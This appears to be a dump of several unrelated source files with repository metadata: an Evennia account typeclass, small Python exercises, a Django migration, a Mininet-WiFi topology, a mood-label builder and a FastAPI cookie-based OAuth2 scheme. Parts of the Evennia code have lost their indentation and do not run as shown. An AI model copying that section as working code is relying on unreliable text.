            access_type (str, optional): Type of access sought.
            default (bool, optional): What to return if no lock of
                access_type was found
            no_superuser_bypass (bool, optional): Turn off superuser
                lock bypassing. Be careful with this one.
        Kwargs:
            kwargs (any): Passed to the at_access hook along with the result.
        Returns:
            result (bool): Result of access check.
        """
        result = super(DefaultAccount, self).access(accessing_obj, access_type=access_type,
                                                    default=default, no_superuser_bypass=no_superuser_bypass)
        # notify the at_access hook; it cannot change the outcome
        self.at_access(result, accessing_obj, access_type, **kwargs)
        return result
@property
def idle_time(self):
"""
Returns the idle time of the least idle session in seconds. If
no sessions are connected it returns nothing.
"""
idle = [session.cmd_last_visible for session in self.sessions.all()]
if idle:
return time.time() - float(max(idle))
return None
@property
def connection_time(self):
"""
Returns the maximum connection time of all connected sessions
in seconds. Returns nothing if there are no sessions.
"""
conn = [session.conn_time for session in self.sessions.all()]
if conn:
return time.time() - float(min(conn))
return None
# account hooks
    def basetype_setup(self):
        """
        This sets up the basic properties for an account. Overload this
        with at_account_creation rather than changing this method.
        Called once, on first save.
        """
        # A basic security setup
        lockstring = "examine:perm(Admin);edit:perm(Admin);" \
                     "delete:perm(Admin);boot:perm(Admin);msg:all();" \
                     "noidletimeout:perm(Builder) or perm(noidletimeout)"
        self.locks.add(lockstring)
        # The ooc account cmdset
        # permanent=True persists the cmdset across server restarts
        self.cmdset.add_default(_CMDSET_ACCOUNT, permanent=True)
    def at_account_creation(self):
        """
        This is called once, the very first time the account is created
        (i.e. first time they register with the game). It's a good
        place to store attributes all accounts should have, like
        configuration values etc.
        """
        # set an (empty) attribute holding the characters this account has
        lockstring = "attrread:perm(Admins);attredit:perm(Admins);" \
                     "attrcreate:perm(Admins);"
        self.attributes.add("_playable_characters", [], lockstring=lockstring)
        # per-account storage for protocol flags restored at login
        self.attributes.add("_saved_protocol_flags", {}, lockstring=lockstring)
    def at_init(self):
        """
        This is always called whenever this object is initiated --
        that is, whenever it its typeclass is cached from memory. This
        happens on-demand first time the object is used or activated
        in some way after being created but also after each server
        restart or reload. In the case of account objects, this usually
        happens the moment the account logs in or reconnects after a
        reload.
        """
        # intentionally a no-op; meant to be overridden in subclasses
        pass
# Note that the hooks below also exist in the character object's
# typeclass. You can often ignore these and rely on the character
# ones instead, unless you are implementing a multi-character game
# and have some things that should be done regardless of which
# character is currently connected to this account.
    def at_first_save(self):
        """
        This is a generic hook called by Evennia when this object is
        saved to the database the very first time. You generally
        don't override this method but the hooks called by it.
        """
        self.basetype_setup()
        self.at_account_creation()
        permissions = settings.PERMISSION_ACCOUNT_DEFAULT
        if hasattr(self, "_createdict"):
            # this will only be set if the utils.create_account
            # function was used to create the object.
            cdict = self._createdict
            if cdict.get("locks"):
                self.locks.add(cdict["locks"])
            if cdict.get("permissions"):
                # createdict permissions replace the settings default
                permissions = cdict["permissions"]
            del self._createdict
        self.permissions.batch_add(*permissions)
    def at_access(self, result, accessing_obj, access_type, **kwargs):
        """
        This is triggered after an access-call on this Account has
        completed.
        Args:
            result (bool): The result of the access check.
            accessing_obj (any): The object requesting the access
                check.
            access_type (str): The type of access checked.
        Kwargs:
            kwargs (any): These are passed on from the access check
                and can be used to relay custom instructions from the
                check mechanism.
        Notes:
            This method cannot affect the result of the lock check and
            its return value is not used in any way. It can be used
            e.g. to customize error messages in a central location or
            create other effects based on the access result.
        """
        # no-op by default; override in subclasses for custom reactions
        pass
    def at_cmdset_get(self, **kwargs):
        """
        Called just *before* cmdsets on this account are requested by
        the command handler. The cmdsets are available as
        `self.cmdset`. If changes need to be done on the fly to the
        cmdset before passing them on to the cmdhandler, this is the
        place to do it. This is called also if the account currently
        have no cmdsets. kwargs are usually not used unless the
        cmdset is generated dynamically.
        """
        # no-op by default; override in subclasses for dynamic cmdsets
        pass
    def at_first_login(self, **kwargs):
        """
        Called the very first time this account logs into the game.
        Note that this is called *before* at_pre_login, so no session
        is established and usually no character is yet assigned at
        this point. This hook is intended for account-specific setup
        like configurations.
        Args:
            **kwargs (dict): Arbitrary, optional arguments for users
                overriding the call (unused by default).
        """
        # no-op by default; override in subclasses
        pass
    def at_pre_login(self, **kwargs):
        """
        Called every time the user logs in, just before the actual
        login-state is set.
        Args:
            **kwargs (dict): Arbitrary, optional arguments for users
                overriding the call (unused by default).
        """
        # no-op by default; override in subclasses
        pass
def _send_to_connect_channel(self, message):
    """
    Relay a message to the channel reserved for connect/disconnect
    announcements, caching the channel lookup in a module global.

    Args:
        message (str): A message to send to the connect channel.
    """
    global _CONNECT_CHANNEL
    # Lazily resolve and cache the connect channel on first use.
    if not _CONNECT_CHANNEL:
        try:
            _CONNECT_CHANNEL = ChannelDB.objects.filter(
                db_key=settings.DEFAULT_CHANNELS[1]["key"])[0]
        except Exception:
            logger.log_trace()
    stamp = timezone.now()
    stamp = "%02i-%02i-%02i(%02i:%02i)" % (
        stamp.year, stamp.month, stamp.day, stamp.hour, stamp.minute)
    if _CONNECT_CHANNEL:
        _CONNECT_CHANNEL.tempmsg("[%s, %s]: %s" % (_CONNECT_CHANNEL.key, stamp, message))
    else:
        # Fall back to the server log when no channel could be found.
        logger.log_info("[%s]: %s" % (stamp, message))
def at_post_login(self, session=None, **kwargs):
    """
    Called at the end of the login process, just before letting
    the account loose.

    Args:
        session (Session, optional): Session logging in, if any.
        **kwargs (dict): Arbitrary, optional arguments for users
            overriding the call (unused by default).

    Notes:
        This is called *before* an eventual Character's
        `at_post_login` hook. By default it is used to set up
        auto-puppeting based on `MULTISESSION_MODE`.
    """
    # if we have saved protocol flags on ourselves, load them here.
    protocol_flags = self.attributes.get("_saved_protocol_flags", None)
    if session and protocol_flags:
        session.update_flags(**protocol_flags)
    # inform the client that we logged in through an OOB message
    if session:
        session.msg(logged_in={})
    self._send_to_connect_channel("|G%s connected|n" % self.key)
    if _MULTISESSION_MODE == 0:
        # in this mode we should have only one character available. We
        # try to auto-connect to our last connected object, if any
        try:
            self.puppet_object(session, self.db._last_puppet)
        except RuntimeError:
            self.msg("The Character does not exist.")
            return
    elif _MULTISESSION_MODE == 1:
        # in this mode all sessions connect to the same puppet.
        try:
            self.puppet_object(session, self.db._last_puppet)
        except RuntimeError:
            self.msg("The Character does not exist.")
            return
    elif _MULTISESSION_MODE in (2, 3):
        # In this mode we by default end up at a character selection
        # screen. We execute look on the account.
        # we make sure to clean up the _playable_characters list in case
        # any was deleted in the interim.
        self.db._playable_characters = [char for char in self.db._playable_characters if char]
        self.msg(self.at_look(target=self.db._playable_characters,
                              session=session))
def at_failed_login(self, session, **kwargs):
    """
    Called by the login process if a user account is targeted correctly
    but provided with an invalid password. By default it does nothing,
    but exists to be overriden.

    Args:
        session (session): Session logging in.
        **kwargs (dict): Arbitrary, optional arguments for users
            overriding the call (unused by default).
    """
    # No-op by default; override e.g. to log or throttle failed attempts.
    pass
def at_disconnect(self, reason=None, **kwargs):
    """
    Called just before user is disconnected.

    Args:
        reason (str, optional): The reason given for the disconnect;
            echoed to the connection channel by default.
        **kwargs (dict): Arbitrary, optional arguments for users
            overriding the call (unused by default).
    """
    # Append the reason in parentheses only when one was supplied.
    suffix = " (%s)" % reason if reason else ""
    self._send_to_connect_channel("|R%s disconnected%s|n" % (self.key, suffix))
def at_post_disconnect(self, **kwargs):
    """
    This is called *after* disconnection is complete. No messages
    can be relayed to the account from here. After this call, the
    account should not be accessed any more, making this a good
    spot for deleting it (in the case of a guest account account,
    for example).

    Args:
        **kwargs (dict): Arbitrary, optional arguments for users
            overriding the call (unused by default).
    """
    # No-op by default; see DefaultGuest for a self-deleting override.
    pass
def at_msg_receive(self, text=None, from_obj=None, **kwargs):
    """
    This hook is called whenever someone sends a message to this
    object using the `msg` method.

    Note that from_obj may be None if the sender did not include
    itself as an argument to the obj.msg() call - so you have to
    check for this.

    Consider this a pre-processing method before msg is passed on
    to the user session. If this method returns False, the msg
    will not be passed on.

    Args:
        text (str, optional): The message received.
        from_obj (any, optional): The object sending the message.

    Kwargs:
        This includes any keywords sent to the `msg` method.

    Returns:
        receive (bool): If this message should be received.

    Notes:
        If this method returns False, the `msg` operation
        will abort without sending the message.
    """
    # Accept all incoming messages by default.
    return True
def at_msg_send(self, text=None, to_obj=None, **kwargs):
    """
    This is a hook that is called when *this* object sends a
    message to another object with `obj.msg(text, to_obj=obj)`.

    Args:
        text (str, optional): Text to send.
        to_obj (any, optional): The object to send to.

    Kwargs:
        Keywords passed from msg()

    Notes:
        Since this method is executed by `from_obj`, if no `from_obj`
        was passed to `DefaultCharacter.msg` this hook will never
        get called.
    """
    # No-op by default; override to react to outgoing messages.
    pass
def at_server_reload(self):
    """
    This hook is called whenever the server is shutting down for
    restart/reboot. If you want to, for example, save
    non-persistent properties across a restart, this is the place
    to do it.
    """
    # No-op by default.
    pass
def at_server_shutdown(self):
    """
    This hook is called whenever the server is shutting down fully
    (i.e. not for a restart).
    """
    # No-op by default.
    pass
def at_look(self, target=None, session=None, **kwargs):
    """
    Called when this object executes a look. It allows to customize
    just what this means.

    Args:
        target (Object or list, optional): An object or a list of
            objects to inspect.
        session (Session, optional): The session doing this look.
        **kwargs (dict): Arbitrary, optional arguments for users
            overriding the call (unused by default).

    Returns:
        look_string (str): A prepared look string, ready to send
        off to any recipient (usually to ourselves)
    """
    if target and not is_iter(target):
        # single target - just show it
        return target.return_appearance(self)
    else:
        # list of targets - build the OOC character-select screen.
        # Convert to a plain list to detach from any db queryset.
        characters = list(tar for tar in target if tar) if target else []
        sessions = self.sessions.all()
        is_su = self.is_superuser

        # text shown when looking in the ooc area
        result = ["Account |g%s|n (you are Out-of-Character)" % self.key]

        nsess = len(sessions)
        result.append(nsess == 1 and "\n\n|wConnected session:|n" or "\n\n|wConnected sessions (%i):|n" % nsess)
        for isess, sess in enumerate(sessions):
            csessid = sess.sessid
            addr = "%s (%s)" % (sess.protocol_key, isinstance(sess.address, tuple) and
                                str(sess.address[0]) or str(sess.address))
            # the session performing this look is marked with '*'
            result.append("\n %s %s" % (session.sessid == csessid and "|w* %s|n" % (isess + 1) or
                                        " %s" % (isess + 1), addr))
        result.append("\n\n |whelp|n - more commands")
        result.append("\n |wooc <Text>|n - talk on public channel")

        # maximum number of playable characters for this account
        charmax = _MAX_NR_CHARACTERS if _MULTISESSION_MODE > 1 else 1

        if is_su or len(characters) < charmax:
            if not characters:
                result.append("\n\n You don't have any characters yet. See |whelp @charcreate|n for creating one.")
            else:
                result.append("\n |w@charcreate <name> [=description]|n - create new character")
                result.append("\n |w@chardelete <name>|n - delete a character (cannot be undone!)")
        if characters:
            string_s_ending = len(characters) > 1 and "s" or ""
            result.append("\n |w@ic <character>|n - enter the game (|w@ooc|n to get back here)")
            if is_su:
                result.append("\n\nAvailable character%s (%i/unlimited):" % (string_s_ending, len(characters)))
            else:
                result.append("\n\nAvailable character%s%s:"
                              % (string_s_ending, charmax > 1 and " (%i/%i)" % (len(characters), charmax) or ""))
            for char in characters:
                csessions = char.sessions.all()
                if csessions:
                    for sess in csessions:
                        # character is already puppeted
                        sid = sess in sessions and sessions.index(sess) + 1
                        if sess and sid:
                            result.append("\n - |G%s|n [%s] (played by you in session %i)"
                                          % (char.key, ", ".join(char.permissions.all()), sid))
                        else:
                            result.append("\n - |R%s|n [%s] (played by someone else)"
                                          % (char.key, ", ".join(char.permissions.all())))
                else:
                    # character is "free to puppet"
                    result.append("\n - %s [%s]" % (char.key, ", ".join(char.permissions.all())))
        # frame the whole screen with horizontal rules
        look_string = ("-" * 68) + "\n" + "".join(result) + "\n" + ("-" * 68)
        return look_string
class DefaultGuest(DefaultAccount):
    """
    This class is used for guest logins. Unlike Accounts, Guests and
    their characters are deleted after disconnection.
    """
    def at_post_login(self, session=None, **kwargs):
        """
        In theory, guests only have one character regardless of which
        MULTISESSION_MODE we're in. They don't get a choice.

        Args:
            session (Session, optional): Session connecting.
            **kwargs (dict): Arbitrary, optional arguments for users
                overriding the call (unused by default).
        """
        self._send_to_connect_channel("|G%s connected|n" % self.key)
        self.puppet_object(session, self.db._last_puppet)

    def at_server_shutdown(self):
        """
        We repeat the functionality of `at_disconnect()` here just to
        be on the safe side.
        """
        super(DefaultGuest, self).at_server_shutdown()
        characters = self.db._playable_characters
        for character in characters:
            if character:
                print "deleting Character:", character
                character.delete()

    def at_post_disconnect(self, **kwargs):
        """
        Once having disconnected, destroy the guest's characters and
        then delete the guest account itself.

        Args:
            **kwargs (dict): Arbitrary, optional arguments for users
                overriding the call (unused by default).
        """
        super(DefaultGuest, self).at_post_disconnect()
        characters = self.db._playable_characters
        for character in characters:
            if character:
                character.delete()
        self.delete()
| [
"griatch@gmail.com"
] | griatch@gmail.com |
b11373667fb38f0359908cf991b2060b7e448e86 | 92ad6aaacc2e2fc215b40455a2999982a0f7f40a | /addno.py | ffdcdb6221a600520186f5ecf2006dbc5b4bd67d | [] | no_license | yashkoli/python-examples | aaa4f5b40749360b13f8777f54ff54d5ba7a8654 | 8cd6f8f96f39d020acdab2006413437bee039cf3 | refs/heads/master | 2021-04-30T12:11:27.430921 | 2018-02-12T16:44:45 | 2018-02-12T16:44:45 | 121,269,597 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | f=open("addno.txt","w")
# Repeatedly prompt for numbers and append each on its own line to the
# already-open file object `f` until the user answers anything but 'y'.
ch = 'y'
while ch == 'y':
    n = input("enter no:")
    f.write("\n")
    f.write(n)
    ch = input("do want contune")
# Bug fix: the original `f.close` (no parentheses) merely referenced the
# method and never closed the file, risking lost buffered writes.
f.close()
| [
"noreply@github.com"
] | yashkoli.noreply@github.com |
e98ba7543f9bd03d820dd5971ece16c7d6274084 | daab8631fa9c992a57da364d4fd0084bdab47ad4 | /ex041.py | cf814a482865c1b4b6a4c09385094c69e97e5476 | [
"MIT"
] | permissive | danoliveiradev/PythonExercicios | e784f2f15db61c4cd22691f465e453a84babee11 | e788191e755f54cd3c51ca24a2d3a2ed32923b12 | refs/heads/main | 2023-08-28T22:31:51.587786 | 2021-09-26T14:00:51 | 2021-09-26T14:00:51 | 410,567,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | from datetime import date
# Swimming-federation age classifier: asks for a birth year, derives the
# swimmer's age and prints the matching competition category in color.
print('-=-' * 20)
print('\033[93mCONFEDERAÇÃO NACIONAL DE NATAÇÃO\033[m')
print('-=-' * 20)
anoNasc = int(input('Digite o ano de seu nascimento, com 4 digitos: '))
idade = date.today().year - anoNasc
# Resolve the category once, then emit a single message.
if idade <= 9:
    categoria = '\033[32mMIRIM'
elif idade <= 14:
    categoria = '\033[34mINFANTIL'
elif idade <= 19:
    categoria = '\033[33mJUNIOR'
elif idade <= 25:
    categoria = '\033[97mSÊNIOR'
else:
    categoria = '\033[31mMASTER'
print('De acordo com a sua idade sua categoria é: ' + categoria)
| [
"danielroliveira.dev@gmail.com"
] | danielroliveira.dev@gmail.com |
b7e6f05612f03e546e673dbfb7c26d8bf885158c | 3f14a1a5541e6159e9d8c59d76fb9a96e4d485d5 | /lists/migrations/0002_item_text.py | 36d352e94053bad2b583e9232893e96b622434f1 | [] | no_license | mkwokgithub/django-tdd | 78ae0c1c94540dbe224680a8c9c52a0b5e3555a0 | 11893e56569e0575490ecd6d56c7256c65a7cce6 | refs/heads/master | 2021-05-16T04:23:21.058812 | 2018-01-04T02:13:40 | 2018-01-04T02:13:40 | 105,926,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-21 18:22
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration adding the ``text`` field to ``Item``."""

    dependencies = [
        ('lists', '0001_initial'),
    ]

    operations = [
        # Add Item.text as a TextField defaulting to the empty string.
        migrations.AddField(
            model_name='item',
            name='text',
            field=models.TextField(default=''),
        ),
    ]
| [
"mkwok@cisco.com"
] | mkwok@cisco.com |
c7ecf4d39fc5da58cbcc70de44441b852b8e730e | a30b39a642421254be04576a02d55d38b6e52bcd | /achilles/tables/__init__.py | 2539b6dbacdf896634e872bf33cf057c10bd596a | [
"Apache-2.0"
] | permissive | blaxter/django-achilles | 5bfb334e95f8bdcf1fa8b751c5103ccf81283814 | ba696083ac42cd405640457fade6cf886dc99bb7 | refs/heads/master | 2021-01-21T18:43:54.214649 | 2014-05-20T17:00:15 | 2014-05-20T17:00:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from . common import Table
from . columns import Column, MergeColumn, ActionColumn
__all__ = ["Table",
"Column",
"MergeColumn",
"ActionColumn"]
| [
"exekias@gmail.com"
] | exekias@gmail.com |
14426566868cacddadbd19f62e605c6b93c000f9 | 5e55919666ff9e41d590682985328bc5f9eebc6b | /twitter_code_dicts.py | 230b9199c4e95a8ea665f76c5448bb93169d1555 | [] | no_license | rtflynn/twitter_flask_app | 2eaa30716f021b2283daa2c8da304ecf629e85c1 | 65ec3265bc490b4e1ecccfb702997b4a5aa0d6c4 | refs/heads/master | 2020-04-10T14:27:19.972441 | 2018-12-09T21:12:11 | 2018-12-09T21:12:11 | 161,077,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 892 | py | langs = {'ar': 'Arabic', 'bg': 'Bulgarian', 'ca': 'Catalan', 'cs': 'Czech', 'da': 'Danish', 'de': 'German', 'el': 'Greek', 'en': 'English', 'es': 'Spanish', 'et': 'Estonian',
'fa': 'Persian', 'fi': 'Finnish', 'fr': 'French', 'hi': 'Hindi', 'hr': 'Croatian', 'hu': 'Hungarian', 'id': 'Indonesian', 'is': 'Icelandic', 'it': 'Italian', 'iw': 'Hebrew',
'ja': 'Japanese', 'ko': 'Korean', 'lt': 'Lithuanian', 'lv': 'Latvian', 'ms': 'Malay', 'nl': 'Dutch', 'no': 'Norwegian', 'pl': 'Polish', 'pt': 'Portuguese', 'ro': 'Romanian',
'ru': 'Russian', 'sk': 'Slovak', 'sl': 'Slovenian', 'sr': 'Serbian', 'sv': 'Swedish', 'th': 'Thai', 'tl': 'Filipino', 'tr': 'Turkish', 'uk': 'Ukrainian', 'ur': 'Urdu',
'vi': 'Vietnamese', 'zh_CN': 'Chinese (simplified)', 'zh_TW': 'Chinese (traditional)', 'NONE' : 'NONE', 'in' : 'in', 'und' : 'und', 'cy' : 'cy'}
error_codes = {}
| [
"noreply@github.com"
] | rtflynn.noreply@github.com |
e2fdf25b7497cc5c1fcb0bf489b3eb9332e5bb62 | 5faa3f139f30c0d290e327e04e3fd96d61e2aabb | /mininet-wifi/SWITCHON-2015/allWirelessNetworksAroundUs.py | 4e0c7e784e0db877764da170ac32d83db2baa977 | [] | no_license | hongyunnchen/reproducible-research | c6dfc3cd3c186b27ab4cf25949470b48d769325a | ed3a7a01b84ebc9bea96c5b02e0c97705cc2f7c6 | refs/heads/master | 2021-05-07T08:24:09.586976 | 2017-10-31T13:08:05 | 2017-10-31T13:08:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,525 | py | #!/usr/bin/python
"""This example is based on this video: https://www.youtube.com/watch?v=_C4H2gBdyQY"""
from mininet.net import Mininet
from mininet.node import Controller, OVSKernelSwitch, OVSKernelAP
from mininet.link import TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
import os
def topology():
    """Create a Mininet-WiFi network: one mobile dual-radio station roaming
    between three APs that are bridged through a single switch to a host.

    Side effects: builds and starts the network, bonds the station's two
    wlan interfaces, plots the mobility graph and drops into the CLI.
    """
    net = Mininet( controller=Controller, link=TCLink, switch=OVSKernelSwitch, accessPoint=OVSKernelAP )

    print "*** Creating nodes"
    # sta1 carries two radios (wlans=2) so it can bond them below.
    sta1 = net.addStation( 'sta1', wlans=2, ip='10.0.0.2/8', max_x=120, max_y=50, min_v=1.4, max_v=1.6 )
    h1 = net.addHost( 'h1', mac='00:00:00:00:00:01', ip='10.0.0.1/8' )
    ap1 = net.addAccessPoint( 'ap1', ssid='ssid_ap1', mode= 'g', channel=6, position='70,25,0' )
    ap2 = net.addAccessPoint( 'ap2', ssid='ssid_ap2', mode= 'g', channel=1, position='30,25,0' )
    ap3 = net.addAccessPoint( 'ap3', ssid='ssid_ap3', mode= 'g', channel=11, position='110,25,0' )
    s4 = net.addSwitch( 's4', mac='00:00:00:00:00:10' )
    c1 = net.addController( 'c1', controller=Controller )

    print "*** Configuring wifi nodes"
    net.configureWifiNodes()

    print "*** Associating and Creating links"
    net.addLink(ap1, s4)
    net.addLink(ap2, s4)
    net.addLink(ap3, s4)
    net.addLink(s4, h1)

    # Bond sta1's two wlan interfaces (mode=3 = broadcast) so traffic
    # survives roaming between APs.
    sta1.cmd('modprobe bonding mode=3')
    sta1.cmd('ip link add bond0 type bond')
    sta1.cmd('ip link set bond0 address 02:01:02:03:04:08')
    sta1.cmd('ip link set sta1-wlan0 down')
    sta1.cmd('ip link set sta1-wlan0 address 00:00:00:00:00:11')
    sta1.cmd('ip link set sta1-wlan0 master bond0')
    sta1.cmd('ip link set sta1-wlan1 down')
    sta1.cmd('ip link set sta1-wlan1 address 00:00:00:00:00:12')
    sta1.cmd('ip link set sta1-wlan1 master bond0')
    sta1.cmd('ip addr add 10.0.0.10/8 dev bond0')
    sta1.cmd('ip link set bond0 up')

    # Fixed seed so the random mobility pattern is reproducible.
    'seed'
    net.seed(12)

    'plotting graph'
    net.plotGraph(max_x=140, max_y=140)

    "*** Available models: RandomWalk, TruncatedLevyWalk, RandomDirection, RandomWaypoint, GaussMarkov ***"
    net.startMobility(startTime=0, model='RandomDirection')

    print "*** Starting network"
    net.build()
    c1.start()
    s4.start( [c1] )
    ap1.start( [c1] )
    ap2.start( [c1] )
    ap3.start( [c1] )
    # Drop sta1's original per-interface address now that bond0 owns one.
    sta1.cmd('ip addr del 10.0.0.2/8 dev sta1-wlan0')
    # Flood-forward on the switch so bonded traffic passes.
    os.system('ovs-ofctl add-flow s4 actions=normal')

    print "*** Running CLI"
    CLI( net )

    print "*** Stopping network"
    net.stop()
if __name__ == '__main__':
    # Script entry point: enable info-level logging, then run the demo.
    setLogLevel( 'info' )
    topology()
| [
"ramonreisfontes@gmail.com"
] | ramonreisfontes@gmail.com |
14cd8c441283367752d210d1352a4860a053167c | 58cf8c5faf1a1e65029b6b4809a357d42c83e4e7 | /code/create_labels.py | dda494df6679a50dc39f96089952a08fe60dfef2 | [] | no_license | seanmandell-zz/mood-predictor-project | 98604c4a1e7a0b60fa3ebed6505a174d4da6f29b | afcce61ddebe17f61eb504efb9d4e57f34796663 | refs/heads/master | 2021-06-01T03:03:11.371700 | 2016-02-09T17:39:55 | 2016-02-09T17:39:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,392 | py | import pandas as pd
import string
def _read_clean(fname):
    '''
    INPUT: string
    OUTPUT: DataFrame

    Reads in CSV file (from ../data/) and returns a cleaned DataFrame
    holding only the daily-mood survey rows, with the answer date and
    the reference date parsed into datetimes.
    '''
    input_name = '../data/' + fname
    df_phone_survey = pd.read_csv(input_name)
    # Keep only rows whose question text mentions "happy" (the mood
    # survey). The `in` operator replaces the Python-2-only module
    # function string.find(), keeping behavior identical but portable.
    df_mood_qs = df_phone_survey[df_phone_survey['questions_raw'].map(lambda x: 'happy' in x)]
    # 'date' column holds the submission timestamp; 'name' embeds the
    # date the answers refer to as its second token.
    df_mood_qs.loc[:, 'answer_date'] = df_mood_qs['date'].map(lambda x: pd.to_datetime(x.split()[0]))
    df_mood_qs.loc[:, 'date'] = df_mood_qs['name'].map(lambda x: pd.to_datetime(x.split()[1]))

    # Drops rows where not all answers are filled in (fully answered
    # surveys serialize to 42-44 characters).
    df_mood_qs.loc[:, 'answers_len'] = df_mood_qs['answers_raw'].map(lambda x: len(x))
    df_mood_qs = df_mood_qs[((df_mood_qs['answers_len'] >= 42) & (df_mood_qs['answers_len'] <= 44))]  # sic
    return df_mood_qs
def _extract_mood_responses(df_mood_qs, poss_labels):
'''
INPUT: DataFrame
OUTPUT: DataFrame
Extracts participants' numerical rankings of their daily moods.
'''
if poss_labels.count('happy') > 0:
df_mood_qs['happy'] = df_mood_qs['answers_raw'].map(lambda x: int(x[17]))
if poss_labels.count('stressed') > 0:
df_mood_qs['stressed'] = df_mood_qs['answers_raw'].map(lambda x: int(x[21]))
if poss_labels.count('productive') > 0:
df_mood_qs['productive'] = df_mood_qs['answers_raw'].map(lambda x: x[25])
df_mood_qs = df_mood_qs[df_mood_qs['productive'] != '>'] # Drops very few
df_mood_qs.loc[:, 'productive'] = df_mood_qs['productive'].map(lambda x: int(x))
df_mood_qs.drop(['name', 'answers_len', 'questions_raw', 'answers_raw'], axis=1, inplace=True)
return df_mood_qs
def _create_dummies(df_mood_qs, to_dummyize, very_cutoff_inclusive, very_un_cutoff_inclusive):
'''
INPUT: DataFrame, list, int, int
OUTPUT: DataFrame
Creates 3 dummies for any/all moods in to_dummyize:
- [mood]_dummy, 1 if mood rated as >= 5
- very_[mood], 1 if mood rated as >= very_cutoff_inclusive
- very_un[mood], 1 if mood rated as <= very_un_cutoff_inclusive
'''
for lab in to_dummyize:
dummy_name = lab + '_dummy'
very_name = 'very_' + lab
very_un_name = 'very_un' + lab
df_mood_qs[dummy_name] = 0 + (df_mood_qs[lab] >= 5)
df_mood_qs[very_name] = 0 + (df_mood_qs[lab] >= 6)
df_mood_qs[very_un_name] = 0 + (df_mood_qs[lab] <= 2)
return df_mood_qs
def create_poss_labels(fname, poss_labels, to_dummyize, very_cutoff_inclusive=6, very_un_cutoff_inclusive=2, answer_offset_cutoff=-1):
    '''
    INPUT: string, list, list, int, int, int
    OUTPUT: DataFrame

    Returns a DataFrame whose columns correspond to labels to be predicted.
    --> answer_offset_cutoff: if != -1, answers submitted *at least* answer_offset_cutoff
        days after the date in question will be omitted
    Columns as follows (indented are optional dummies specified by to_dummyize parameter):
    - participantID
    - date
    - happy (1-7, 7 is happiest)
        - happy_dummy, 1 if happy >= 4
        - very_happy, 1 if happy >= very_cutoff_inclusive
        - very_unhappy, 1 if happy <= very_un_cutoff_inclusive
    - stressed (1-7, 7 is most stressed)
        - stressed_dummy, 1 if stressed >= 4
        - very_stressed, 1 if stressed >= very_cutoff_inclusive
        - very_unstressed, 1 if stressed <= very_un_cutoff_inclusive
    - productive (1-7, 7 is most productive)
        - productive_dummy, 1 if productive >= 4
        - very_productive, 1 if productive >= very_cutoff_inclusive
        - very_unproductive, 1 if productive <= very_un_cutoff_inclusive

    NOTE(review): _create_dummies actually uses >= 5 for the *_dummy
    columns, not >= 4 as stated above -- confirm the intended cutoff.
    '''
    df_mood_qs = _read_clean(fname)
    df_mood_qs = _extract_mood_responses(df_mood_qs, poss_labels)
    df_mood_qs = _create_dummies(df_mood_qs, to_dummyize, very_cutoff_inclusive, very_un_cutoff_inclusive)

    ''' Drops where the survey is answered before the corresponding date has passed '''
    df_mood_qs['answer_offset_days'] = df_mood_qs['answer_date'] - df_mood_qs['date']
    df_mood_qs = df_mood_qs[df_mood_qs['answer_offset_days'] >= pd.to_timedelta('0 days')]
    if answer_offset_cutoff != -1:
        # NOTE(review): answer_offset_days is a Timedelta while
        # answer_offset_cutoff is an int; this comparison may raise on
        # modern pandas -- confirm callers pass a compatible value.
        df_mood_qs = df_mood_qs[df_mood_qs['answer_offset_days'] < answer_offset_cutoff]
    df_mood_qs.drop(['answer_offset_days', 'answer_date'], axis=1, inplace=True)
    return df_mood_qs
| [
"sean.mandell1@gmail.com"
] | sean.mandell1@gmail.com |
49ffeca35c1b74f3925d227c6a8d353c78c2eee2 | 2601395b3cd4ddd61f6b09f21ee34c47a11e40e4 | /database/oauth2_password_bearer_cookie.py | 10ce006f65505b415606799f508b92a8ee73be0c | [] | no_license | taiharry108/fastapi-manga-server | 3197a98d5027a9069efd207c2c0b19c0075491c5 | e09102c9122cb1aa69bbeb9b87a868bf3c0073c2 | refs/heads/master | 2023-01-03T12:19:32.761083 | 2020-09-12T01:00:05 | 2020-09-12T01:00:05 | 288,659,800 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,798 | py | from fastapi.security.oauth2 import (
OAuth2,
OAuthFlowsModel,
get_authorization_scheme_param,
)
from typing import Optional
from starlette.requests import Request
from starlette.status import HTTP_403_FORBIDDEN
from fastapi import HTTPException
class OAuth2PasswordBearerCookie(OAuth2):
    """OAuth2 password-flow scheme that accepts the bearer token either in
    the ``Authorization`` header or in an ``Authorization`` cookie, with
    the header taking precedence."""

    def __init__(
        self,
        tokenUrl: str,
        scheme_name: str = None,
        scopes: dict = None,
        auto_error: bool = True,
    ):
        """Configure the password flow; ``scopes`` defaults to empty."""
        flows = OAuthFlowsModel(
            password={"tokenUrl": tokenUrl, "scopes": scopes or {}})
        super().__init__(flows=flows, scheme_name=scheme_name, auto_error=auto_error)

    async def __call__(self, request: Request) -> Optional[str]:
        """Return the bearer token for this request, or None.

        Checks the Authorization header first, then the cookie. When no
        Bearer credential is found, raises 403 if ``auto_error`` is set,
        otherwise returns None.
        """
        candidates = (
            request.headers.get("Authorization"),
            request.cookies.get("Authorization"),
        )
        for value in candidates:
            scheme, param = get_authorization_scheme_param(value)
            if scheme.lower() == "bearer":
                return param
        if self.auto_error:
            raise HTTPException(
                status_code=HTTP_403_FORBIDDEN, detail="Not authenticated"
            )
        return None
| [
"taiharry108@gmail.com"
] | taiharry108@gmail.com |
